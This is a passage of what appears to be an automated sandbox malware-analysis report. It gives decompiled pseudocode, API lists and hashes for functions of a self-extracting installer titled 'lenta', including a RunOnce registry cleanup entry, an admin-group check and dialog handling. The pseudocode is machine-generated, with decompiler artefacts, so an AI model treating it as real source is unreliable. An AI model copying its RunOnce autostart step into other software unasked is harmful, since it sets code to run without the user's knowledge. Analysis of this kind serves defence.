                              • CharUpperA.USER32(9FDBF5B5,00000000,00000000,00000000), ref: 010E27A8
                              • CharNextA.USER32(0000054D), ref: 010E27B5
                              • CharNextA.USER32(00000000), ref: 010E27BC
                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2829
                              • RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2852
                              • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2870
                              • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E28A0
                              • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010E28AA
                              • GetSystemDirectoryA.KERNEL32 ref: 010E28B9
                              Strings
                              • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010E27E4
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                              • API String ID: 2659952014-2428544900
                              • Opcode ID: fb82445c74c5915658971610231e57e79724568a73cb72334f8445f8789be33c
                              • Instruction ID: a8898992a58c37551a9b7d7ca8384e5672c5a538c612aa0fffad0cb81eba2002
                              • Opcode Fuzzy Hash: fb82445c74c5915658971610231e57e79724568a73cb72334f8445f8789be33c
                              • Instruction Fuzzy Hash: C841BF71A01128AFDB659B669C89AFE7BFCEB59700F0040E9F5C9D7104CB758E858FA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 62%
                              			E010E2267() {
                              				signed int _v8;
                              				char _v268;
                              				char _v836;
                              				void* _v840;
                              				int _v844;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t19;
                              				intOrPtr _t33;
                              				void* _t38;
                              				intOrPtr* _t42;
                              				void* _t45;
                              				void* _t47;
                              				void* _t49;
                              				signed int _t51;
                              
                              				_t19 =  *0x10e8004; // 0x9fdbf5b5
                              				_t20 = _t19 ^ _t51;
                              				_v8 = _t19 ^ _t51;
                              				if( *0x10e8530 != 0) {
                              					_push(_t49);
                              					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                              						_push(_t38);
                              						_v844 = 0x238;
                              						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                              							_push(_t47);
                              							memset( &_v268, 0, 0x104);
                              							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                              								E010E658A( &_v268, 0x104, 0x10e1140);
                              							}
                              							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              							E010E171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                              							_t42 =  &_v836;
                              							_t45 = _t42 + 1;
                              							_pop(_t47);
                              							do {
                              								_t33 =  *_t42;
                              								_t42 = _t42 + 1;
                              							} while (_t33 != 0);
                              							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                              						}
                              						_t20 = RegCloseKey(_v840);
                              						_pop(_t38);
                              					}
                              					_pop(_t49);
                              				}
                              				return E010E6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                              			}



















                              0x010e2272
                              0x010e2277
                              0x010e2279
                              0x010e2283
                              0x010e2289
                              0x010e22ab
                              0x010e22b1
                              0x010e22c4
                              0x010e22e0
                              0x010e22e6
                              0x010e22f5
                              0x010e230d
                              0x010e231c
                              0x010e231c
                              0x010e2321
                              0x010e233a
                              0x010e2342
                              0x010e2348
                              0x010e234b
                              0x010e234c
                              0x010e234c
                              0x010e234e
                              0x010e234f
                              0x010e236e
                              0x010e236e
                              0x010e237a
                              0x010e2380
                              0x010e2380
                              0x010e2381
                              0x010e2381
                              0x010e238f

                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010E22A3
                              • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 010E22D8
                              • memset.MSVCRT ref: 010E22F5
                              • GetSystemDirectoryA.KERNEL32 ref: 010E2305
                              • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 010E236E
                              • RegCloseKey.ADVAPI32(?), ref: 010E237A
                              Strings
                              • wextract_cleanup0, xrefs: 010E227C, 010E22CD, 010E2363
                              • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010E232D
                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010E2321
                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010E2299
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                              • API String ID: 3027380567-2036266374
                              • Opcode ID: 7d5921f6fcd41dde1b75c8ffcdd0617358a28680dd670a22d5f9bac8957245e1
                              • Instruction ID: 70048e7a767b88be1c9534ebe36549911bcb1f9ea0c9ffa9f52df40c3a7b32c9
                              • Opcode Fuzzy Hash: 7d5921f6fcd41dde1b75c8ffcdd0617358a28680dd670a22d5f9bac8957245e1
                              • Instruction Fuzzy Hash: 4331B671A00218AFDB719A67DC4CFEA7BFCEB14740F0401EAB58DAA005DA75AB84CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E010E3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				void* _t8;
                              				void* _t11;
                              				void* _t15;
                              				struct HWND__* _t16;
                              				struct HWND__* _t33;
                              				struct HWND__* _t34;
                              
                              				_t8 = _a8 - 0xf;
                              				if(_t8 == 0) {
                              					if( *0x10e8590 == 0) {
                              						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                              						 *0x10e8590 = 1;
                              					}
                              					L13:
                              					return 0;
                              				}
                              				_t11 = _t8 - 1;
                              				if(_t11 == 0) {
                              					L7:
                              					_push(0);
                              					L8:
                              					EndDialog(_a4, ??);
                              					L9:
                              					return 1;
                              				}
                              				_t15 = _t11 - 0x100;
                              				if(_t15 == 0) {
                              					_t16 = GetDesktopWindow();
                              					_t33 = _a4;
                              					E010E43D0(_t33, _t16);
                              					SetDlgItemTextA(_t33, 0x834,  *0x10e8d4c);
                              					SetWindowTextA(_t33, "lenta");
                              					SetForegroundWindow(_t33);
                              					_t34 = GetDlgItem(_t33, 0x834);
                              					 *0x10e88b8 = GetWindowLongA(_t34, 0xfffffffc);
                              					SetWindowLongA(_t34, 0xfffffffc, E010E30C0);
                              					return 1;
                              				}
                              				if(_t15 != 1) {
                              					goto L13;
                              				}
                              				if(_a12 != 6) {
                              					if(_a12 != 7) {
                              						goto L9;
                              					}
                              					goto L7;
                              				}
                              				_push(1);
                              				goto L8;
                              			}









                              0x010e3108
                              0x010e310b
                              0x010e31b7
                              0x010e31ca
                              0x010e31d0
                              0x010e31d0
                              0x010e31da
                              0x00000000
                              0x010e31da
                              0x010e3111
                              0x010e3114
                              0x010e3136
                              0x010e3136
                              0x010e3138
                              0x010e313b
                              0x010e3141
                              0x00000000
                              0x010e3143
                              0x010e3116
                              0x010e311b
                              0x010e314b
                              0x010e3151
                              0x010e3158
                              0x010e316a
                              0x010e3176
                              0x010e317d
                              0x010e318b
                              0x010e319e
                              0x010e31a3
                              0x00000000
                              0x010e31ad
                              0x010e3120
                              0x00000000
                              0x00000000
                              0x010e312a
                              0x010e3134
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e3134
                              0x010e312c
                              0x00000000

                              APIs
                              • EndDialog.USER32(?,00000000), ref: 010E313B
                              • GetDesktopWindow.USER32 ref: 010E314B
                              • SetDlgItemTextA.USER32(?,00000834), ref: 010E316A
                              • SetWindowTextA.USER32(?,lenta), ref: 010E3176
                              • SetForegroundWindow.USER32(?), ref: 010E317D
                              • GetDlgItem.USER32(?,00000834), ref: 010E3185
                              • GetWindowLongA.USER32(00000000,000000FC), ref: 010E3190
                              • SetWindowLongA.USER32(00000000,000000FC,010E30C0), ref: 010E31A3
                              • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010E31CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                              • String ID: lenta
                              • API String ID: 3785188418-2780258678
                              • Opcode ID: 7510c387d5a7dda01d7a4d5435f81e05a071290532b1a37e21b8795460e25e35
                              • Instruction ID: 868cca3ca0114521a9a515a1a90f6e8cb281d551122273dbe03f66e42256abe5
                              • Opcode Fuzzy Hash: 7510c387d5a7dda01d7a4d5435f81e05a071290532b1a37e21b8795460e25e35
                              • Instruction Fuzzy Hash: 9C119031644221FFDB315B2A9C0CB5A3EF4BB4AB61F014699F9E5AF184DB7AC141C741
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E010E468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                              				long _t4;
                              				void* _t11;
                              				CHAR* _t14;
                              				void* _t15;
                              				long _t16;
                              
                              				_t14 = __ecx;
                              				_t11 = __edx;
                              				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                              				_t16 = _t4;
                              				if(_t16 <= _a4 && _t11 != 0) {
                              					if(_t16 == 0) {
                              						L5:
                              						return 0;
                              					}
                              					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                              					if(_t15 == 0) {
                              						goto L5;
                              					}
                              					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                              					FreeResource(_t15);
                              					return _t16;
                              				}
                              				return _t4;
                              			}








                              0x010e4699
                              0x010e469b
                              0x010e46a9
                              0x010e46af
                              0x010e46b4
                              0x010e46bc
                              0x010e46f9
                              0x00000000
                              0x010e46f9
                              0x010e46d9
                              0x010e46dd
                              0x00000000
                              0x00000000
                              0x010e46e5
                              0x010e46ef
                              0x00000000
                              0x010e46f5
                              0x010e46ff

                              APIs
                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                              • SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                              • LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                              • LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                              • memcpy_s.MSVCRT ref: 010E46E5
                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                              • String ID: TITLE$lenta
                              • API String ID: 3370778649-2035842925
                              • Opcode ID: bfc40be86e04a884c0228efe902c6a0e104b4eccbe080d047353a3c6f9c7120a
                              • Instruction ID: 0267dae0dde62032dd08ee2b89d130583609c4b169708d62b2e147a521e80183
                              • Opcode Fuzzy Hash: bfc40be86e04a884c0228efe902c6a0e104b4eccbe080d047353a3c6f9c7120a
                              • Instruction Fuzzy Hash: 17018F36340210BBE3301AAB6C0CF2B7EE8DB8DF61F054014FAC9DB144C966884487A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 57%
                              			E010E17EE(intOrPtr* __ecx) {
                              				signed int _v8;
                              				short _v12;
                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                              				_Unknown_base(*)()* _v20;
                              				void* _v24;
                              				intOrPtr* _v28;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t14;
                              				_Unknown_base(*)()* _t20;
                              				long _t28;
                              				void* _t35;
                              				struct HINSTANCE__* _t36;
                              				signed int _t38;
                              				intOrPtr* _t39;
                              
                              				_t14 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t14 ^ _t38;
                              				_v12 = 0x500;
                              				_t37 = __ecx;
                              				_v16.Value = 0;
                              				_v28 = __ecx;
                              				_t28 = 0;
                              				_t36 = LoadLibraryA("advapi32.dll");
                              				if(_t36 != 0) {
                              					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                              					_v20 = _t20;
                              					if(_t20 != 0) {
                              						 *_t37 = 0;
                              						_t28 = 1;
                              						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                              							_t37 = _t39;
                              							 *0x10ea288(0, _v24, _v28);
                              							_v20();
                              							if(_t39 != _t39) {
                              								asm("int 0x29");
                              							}
                              							FreeSid(_v24);
                              						}
                              					}
                              					FreeLibrary(_t36);
                              				}
                              				return E010E6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                              			}



















                              0x010e17f6
                              0x010e17fd
                              0x010e1805
                              0x010e180b
                              0x010e180d
                              0x010e1815
                              0x010e1818
                              0x010e1820
                              0x010e1824
                              0x010e182c
                              0x010e1832
                              0x010e1837
                              0x010e1851
                              0x010e1854
                              0x010e185d
                              0x010e1862
                              0x010e186c
                              0x010e1872
                              0x010e1877
                              0x010e187e
                              0x010e187e
                              0x010e1883
                              0x010e1883
                              0x010e185d
                              0x010e188a
                              0x010e188a
                              0x010e18a2

                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010E18DD), ref: 010E181A
                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010E182C
                              • AllocateAndInitializeSid.ADVAPI32(010E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010E18DD), ref: 010E1855
                              • FreeSid.ADVAPI32(?,?,?,?,010E18DD), ref: 010E1883
                              • FreeLibrary.KERNEL32(00000000,?,?,?,010E18DD), ref: 010E188A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                              • String ID: CheckTokenMembership$advapi32.dll
                              • API String ID: 4204503880-1888249752
                              • Opcode ID: 27369c98905bec81fbbe303482e1932502d8d483f20f4879374e915ae9e7cdb3
                              • Instruction ID: 4e0845ff00ce17e0037ad6bb8e5179883e3db37acc1bc3c7b70922bf7f5e1cef
                              • Opcode Fuzzy Hash: 27369c98905bec81fbbe303482e1932502d8d483f20f4879374e915ae9e7cdb3
                              • Instruction Fuzzy Hash: 52118431F00209EFDB149FA6DC4DABEBFF8EB48710F500169FA45E7240DA3599008790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                              				void* _t7;
                              				void* _t11;
                              				struct HWND__* _t12;
                              				int _t22;
                              				struct HWND__* _t24;
                              
                              				_t7 = _a8 - 0x10;
                              				if(_t7 == 0) {
                              					EndDialog(_a4, 2);
                              					L11:
                              					return 1;
                              				}
                              				_t11 = _t7 - 0x100;
                              				if(_t11 == 0) {
                              					_t12 = GetDesktopWindow();
                              					_t24 = _a4;
                              					E010E43D0(_t24, _t12);
                              					SetWindowTextA(_t24, "lenta");
                              					SetDlgItemTextA(_t24, 0x838,  *0x10e9404);
                              					SetForegroundWindow(_t24);
                              					goto L11;
                              				}
                              				if(_t11 == 1) {
                              					_t22 = _a12;
                              					if(_t22 < 6) {
                              						goto L11;
                              					}
                              					if(_t22 <= 7) {
                              						L8:
                              						EndDialog(_a4, _t22);
                              						return 1;
                              					}
                              					if(_t22 != 0x839) {
                              						goto L11;
                              					}
                              					 *0x10e91dc = 1;
                              					goto L8;
                              				}
                              				return 0;
                              			}








                              0x010e3459
                              0x010e345c
                              0x010e34d8
                              0x010e34de
                              0x00000000
                              0x010e34e0
                              0x010e345e
                              0x010e3463
                              0x010e349a
                              0x010e34a0
                              0x010e34a7
                              0x010e34b2
                              0x010e34c4
                              0x010e34cb
                              0x00000000
                              0x010e34cb
                              0x010e3468
                              0x010e346e
                              0x010e3474
                              0x00000000
                              0x00000000
                              0x010e347c
                              0x010e348c
                              0x010e3490
                              0x00000000
                              0x010e3496
                              0x010e3484
                              0x00000000
                              0x00000000
                              0x010e3486
                              0x00000000
                              0x010e3486
                              0x00000000

                              APIs
                              • EndDialog.USER32(?,?), ref: 010E3490
                              • GetDesktopWindow.USER32 ref: 010E349A
                              • SetWindowTextA.USER32(?,lenta), ref: 010E34B2
                              • SetDlgItemTextA.USER32(?,00000838), ref: 010E34C4
                              • SetForegroundWindow.USER32(?), ref: 010E34CB
                              • EndDialog.USER32(?,00000002), ref: 010E34D8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Window$DialogText$DesktopForegroundItem
                              • String ID: lenta
                              • API String ID: 852535152-2780258678
                              • Opcode ID: e0e494a564392efdeb0ee77f5a618f2c314b7ed6ebcd682f261f99eac31af47a
                              • Instruction ID: a7e99374409ac04354dca54156f0a69900fde27d38e13228d6800bf226afe5fc
                              • Opcode Fuzzy Hash: e0e494a564392efdeb0ee77f5a618f2c314b7ed6ebcd682f261f99eac31af47a
                              • Instruction Fuzzy Hash: 1F01B1B9340114AFD72A5F6BD80C9AE3EE4FB49B51B008054FAC68F584CF36EA41CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E010E2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t16;
                              				int _t21;
                              				char _t32;
                              				intOrPtr _t34;
                              				char* _t38;
                              				char _t42;
                              				char* _t44;
                              				CHAR* _t52;
                              				intOrPtr* _t55;
                              				CHAR* _t59;
                              				void* _t62;
                              				CHAR* _t64;
                              				CHAR* _t65;
                              				signed int _t66;
                              
                              				_t60 = __edx;
                              				_t16 =  *0x10e8004; // 0x9fdbf5b5
                              				_t17 = _t16 ^ _t66;
                              				_v8 = _t16 ^ _t66;
                              				_t65 = _a4;
                              				_t44 = __edx;
                              				_t64 = __ecx;
                              				if( *((char*)(__ecx)) != 0) {
                              					GetModuleFileNameA( *0x10e9a3c,  &_v268, 0x104);
                              					while(1) {
                              						_t17 =  *_t64;
                              						if(_t17 == 0) {
                              							break;
                              						}
                              						_t21 = IsDBCSLeadByte(_t17);
                              						 *_t65 =  *_t64;
                              						if(_t21 != 0) {
                              							_t65[1] = _t64[1];
                              						}
                              						if( *_t64 != 0x23) {
                              							L19:
                              							_t65 = CharNextA(_t65);
                              						} else {
                              							_t64 = CharNextA(_t64);
                              							if(CharUpperA( *_t64) != 0x44) {
                              								if(CharUpperA( *_t64) != 0x45) {
                              									if( *_t64 == 0x23) {
                              										goto L19;
                              									}
                              								} else {
                              									E010E1680(_t65, E010E17C8(_t44, _t65),  &_v268);
                              									_t52 = _t65;
                              									_t14 =  &(_t52[1]); // 0x2
                              									_t60 = _t14;
                              									do {
                              										_t32 =  *_t52;
                              										_t52 =  &(_t52[1]);
                              									} while (_t32 != 0);
                              									goto L17;
                              								}
                              							} else {
                              								E010E65E8( &_v268);
                              								_t55 =  &_v268;
                              								_t62 = _t55 + 1;
                              								do {
                              									_t34 =  *_t55;
                              									_t55 = _t55 + 1;
                              								} while (_t34 != 0);
                              								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                              								if(_t38 != 0 &&  *_t38 == 0x5c) {
                              									 *_t38 = 0;
                              								}
                              								E010E1680(_t65, E010E17C8(_t44, _t65),  &_v268);
                              								_t59 = _t65;
                              								_t12 =  &(_t59[1]); // 0x2
                              								_t60 = _t12;
                              								do {
                              									_t42 =  *_t59;
                              									_t59 =  &(_t59[1]);
                              								} while (_t42 != 0);
                              								L17:
                              								_t65 =  &(_t65[_t52 - _t60]);
                              							}
                              						}
                              						_t64 = CharNextA(_t64);
                              					}
                              					 *_t65 = _t17;
                              				}
                              				return E010E6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                              			}






















                              0x010e2aac
                              0x010e2ab7
                              0x010e2abc
                              0x010e2abe
                              0x010e2ac3
                              0x010e2ac6
                              0x010e2ac9
                              0x010e2ace
                              0x010e2ae6
                              0x010e2bdc
                              0x010e2bdc
                              0x010e2be0
                              0x00000000
                              0x00000000
                              0x010e2af2
                              0x010e2afc
                              0x010e2b00
                              0x010e2b05
                              0x010e2b05
                              0x010e2b0b
                              0x010e2bca
                              0x010e2bd1
                              0x010e2b11
                              0x010e2b18
                              0x010e2b26
                              0x010e2b99
                              0x010e2bc8
                              0x00000000
                              0x00000000
                              0x010e2b9b
                              0x010e2bae
                              0x010e2bb3
                              0x010e2bb5
                              0x010e2bb5
                              0x010e2bb8
                              0x010e2bb8
                              0x010e2bba
                              0x010e2bbb
                              0x00000000
                              0x010e2bb8
                              0x010e2b28
                              0x010e2b2e
                              0x010e2b33
                              0x010e2b39
                              0x010e2b3c
                              0x010e2b3c
                              0x010e2b3e
                              0x010e2b3f
                              0x010e2b55
                              0x010e2b5d
                              0x010e2b64
                              0x010e2b64
                              0x010e2b7a
                              0x010e2b7f
                              0x010e2b81
                              0x010e2b81
                              0x010e2b84
                              0x010e2b84
                              0x010e2b86
                              0x010e2b87
                              0x010e2bbf
                              0x010e2bc1
                              0x010e2bc1
                              0x010e2b26
                              0x010e2bda
                              0x010e2bda
                              0x010e2be6
                              0x010e2be6
                              0x010e2bf8

                              APIs
                              • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 010E2AE6
                              • IsDBCSLeadByte.KERNEL32(00000000), ref: 010E2AF2
                              • CharNextA.USER32(?), ref: 010E2B12
                              • CharUpperA.USER32 ref: 010E2B1E
                              • CharPrevA.USER32(?,?), ref: 010E2B55
                              • CharNextA.USER32(?), ref: 010E2BD4
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                              • String ID:
                              • API String ID: 571164536-0
                              • Opcode ID: fa29d2d9df99b0b41dabfe9086007ceda3444729974de75fbe9adb075061029f
                              • Instruction ID: 2f965684977c52619089d0fd4a2bd4a22441e97f96c73496c354bb14075210b0
                              • Opcode Fuzzy Hash: fa29d2d9df99b0b41dabfe9086007ceda3444729974de75fbe9adb075061029f
                              • Instruction Fuzzy Hash: 87412A346042459FDF669F399858AFE7FED9F56710F0440DAD8C287202DB7A8A86CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E010E43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                              				signed int _v8;
                              				struct tagRECT _v24;
                              				struct tagRECT _v40;
                              				struct HWND__* _v44;
                              				intOrPtr _v48;
                              				int _v52;
                              				intOrPtr _v56;
                              				int _v60;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t29;
                              				void* _t53;
                              				intOrPtr _t56;
                              				int _t59;
                              				struct HWND__* _t63;
                              				struct HWND__* _t67;
                              				struct HWND__* _t68;
                              				struct HDC__* _t69;
                              				int _t72;
                              				signed int _t74;
                              
                              				_t63 = __edx;
                              				_t29 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t29 ^ _t74;
                              				_t68 = __edx;
                              				_v44 = __ecx;
                              				GetWindowRect(__ecx,  &_v40);
                              				_t53 = _v40.bottom - _v40.top;
                              				_v48 = _v40.right - _v40.left;
                              				GetWindowRect(_t68,  &_v24);
                              				_v56 = _v24.bottom - _v24.top;
                              				_t69 = GetDC(_v44);
                              				_v52 = GetDeviceCaps(_t69, 8);
                              				_v60 = GetDeviceCaps(_t69, 0xa);
                              				ReleaseDC(_v44, _t69);
                              				_t56 = _v48;
                              				asm("cdq");
                              				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                              				_t67 = 0;
                              				if(_t72 >= 0) {
                              					_t63 = _v52;
                              					if(_t72 + _t56 > _t63) {
                              						_t72 = _t63 - _t56;
                              					}
                              				} else {
                              					_t72 = _t67;
                              				}
                              				asm("cdq");
                              				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                              				if(_t59 >= 0) {
                              					_t63 = _v60;
                              					if(_t59 + _t53 > _t63) {
                              						_t59 = _t63 - _t53;
                              					}
                              				} else {
                              					_t59 = _t67;
                              				}
                              				return E010E6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                              			}
























                              0x010e43d0
                              0x010e43d8
                              0x010e43df
                              0x010e43e6
                              0x010e43ec
                              0x010e43f1
                              0x010e4400
                              0x010e4403
                              0x010e440b
                              0x010e4420
